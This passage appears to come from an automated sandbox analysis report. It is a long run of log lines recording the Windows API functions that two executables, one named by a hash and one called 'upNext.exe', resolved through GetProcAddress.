SetWindowTextA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter SendMessageA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessageA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RegisterClassA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter PostMessageA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter PeekMessageA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetWindowTextA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetWindowLongA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetMessageA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetClassNameA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetClassInfoA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FindWindowA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter DispatchMessageA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter WSACleanup (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter WSAStartup (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter gethostname (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter gethostbyname (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter socket (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter send (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter select (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter recv (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter inet_ntoa (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter inet_addr (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter htons (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter connect (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter closesocket (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FindNextUrlCacheEntryA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FindFirstUrlCacheEntryA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter DefWindowProcA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter EnumWindows (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter PostQuitMessage (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter ShowWindow (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetWindowThreadProcessId (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CreateWindowExA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter DestroyWindow (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter SetWindowLongA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter KillTimer (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter SetTimer (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CoInitialize (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VariantChangeTypeEx (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarNeg (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarNot (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarAdd (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarSub (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarMul (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarDiv (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarIdiv (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarMod (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarAnd (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarOr (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarXor (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarCmp (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarI4FromStr (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarR4FromStr (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarR8FromStr (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarDateFromStr (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarCyFromStr (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarBoolFromStr (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarBstrFromCy (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarBstrFromDate (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter VarBstrFromBool (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter InitializeFlatSB (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter UninitializeFlatSB (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollProp (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollProp (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FlatSB_EnableScrollBar (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FlatSB_ShowScrollBar (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollRange (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollInfo (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollPos (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollPos (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollInfo (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollRange (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter SetLayeredWindowAttributes (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter AnimateWindow (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CoCreateInstanceEx (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CoAddRefServerProcess (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CoReleaseServerProcess (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CoResumeClassObjects (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter CoSuspendClassObjects (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter OleIconToCursor (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter OleCreateFontIndirect (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter OleCreatePictureIndirect (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter OleLoadPicture (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter OleTranslateColor (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter OleCreatePropertyFrame (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter OleCreatePropertyFrameIndirect (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00006072)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetVersion (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetThreadLocale (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindFirstFileA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindClose (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetEndOfFile (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetStdHandle (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter LoadStringA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter MessageBoxA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ReleaseMutex (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter MoveFileA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetStringTypeExA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetPrivateProfileStringA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" 